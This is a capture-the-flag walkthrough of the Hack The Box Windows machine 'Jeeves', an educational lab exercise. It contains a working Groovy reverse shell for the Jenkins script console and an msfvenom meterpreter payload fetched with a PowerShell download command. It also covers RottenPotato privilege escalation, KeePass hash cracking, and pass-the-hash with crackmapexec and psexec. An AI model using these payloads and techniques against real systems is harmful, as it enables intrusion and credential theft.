Today, we’re going to solve another CTF machine “Jeeves”. It is now retired box and can be accessible to VIP member.

Specifications

  • Target OS: Windows
  • IP Address: 10.10.10.63
  • Difficulty: Medium

Contents

  • Getting user
  • Getting root

Enumeration

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -p 1-65535 -T4 -A -v 10.10.10.63

Enumerating Port 80

Nmap reveals IIS httpd 10.0 running on port 80 with a search page showing ask jeeves.

If you check page source there’s an error.html page which just has jeeves.PNG image.

This image reveals some of the information which might help us in exploiting or doing priv esc on the box.

Enumerating Port 50000

Nmap reveals Jetty service running on port 50000 and if we browse the page 10.10.10.63:50000

Let’s run the dirbuster to see if there’s anything hidden.

We found /askjeeves and let’s take a look at it.

Exploitation

If we google about Jenkins exploits we found we can use the Jenkins-CI Groovy script console to execute OS commands using Java.

Reverse Shell: https://alionder.net/jenkins-script-console-code-exec-reverse-shell-java-deserialization

Manage Jenkins > Script Console

Reverse Shell

String host="10.10.14.27";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Click Run and Start the listener.

Since, we got the low privilege shell let’s try upgrading it through meterpreter.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1338 -f exe > shell.exe

Using Powershell to transfer our generated shell.exe file targeted machine.

powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.27:8000/shell.exe', 'shell.exe')"

After running the powershell and executing shell.exe we got meterpreter session.

We can find user.txt under C:\Users\kohsuke\Desktop

Privilege Escalation

Method 1

We start by gathering basic information about our targeted system so let’s check systeminfo first.

Copy all this information into local file named systeminfo.txt. Now we’re gonna run windows exploit suggester.

python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2019-08-01-mssb.xls --systeminfo systeminfo.txt

The machine is vulnerable with MS16-075 (RottenPotato)
https://github.com/foxglovesec/RottenPotato

Abusing Token Privileges For Windows Local Privilege Escalation

https://github.com/foxglovesec/RottenPotato
https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation

Currently there’s no Impersonation Tokens available let’s run the RottenPotato.exe again.

There you go!

impersonate_token "NT AUTHORITY\\SYSTEM"

And we’re NT AUTHORITY\SYSTEM.

Method 2

There’s a file CEH.kdbx under C:\Users\kohsuke\Documents.

After downloading a file we had to make sure of the file type.

This reveals Keepass password database file type.

Open KeePass file.

keepassx CEH.kdbx

This file is protected with a password but we know how to get it 🙂

There’s a pre-installed program in Kali named keepass2john.

keepass2john CEH.kdbx > key


CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282
f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48

Let’s crack the hash key.

Cracking Has Using John

john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt key

Password: moonshine1

Let’s open our keepass file.

There’s bunch of data to be noted upon checking each of them we found backup stuff revealing critical information.

NTLM Hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

The SMB service is running on the targeted machine we can attempt to authenticate to the system using password spray attack or pass-the-hash attack.

Here’s the remaining content of keepass file.

Password
12345
F7WhTrSFDKB6sxHU1cUn
pwndyouall!
lCEUnYPjNfIuPZSzOySA
S1TjAtJHKsugh9oC4VZl
aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

But we found something interesting inside Backup Stuff.

NTLM Hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00

The SMB service is running on the targeted machine we can attempt to authenticate to the system using password spray attack or pass-the-hash attack.

crackmapexec smb 10.10.10.63 -u Administrator -p passwords.txt --lusers
crackmapexec smb 10.10.10.63 -u Administrator -H hash.txt --lusers

Metasploit PSEXEC Module

Module: exploit/windows/smb/psexec

Now let’s run it!

And we’re NT Authority.

Now let’s look for the flag.

dir /a will show all the hidden files on the system and dir /R will show the alternative data stream.

The hm.txt:root.txt:$DATA means that root.txt is inside the alternative data stream of hm.txt

To read the root.txt more < hm.txt:root.txt:$DATA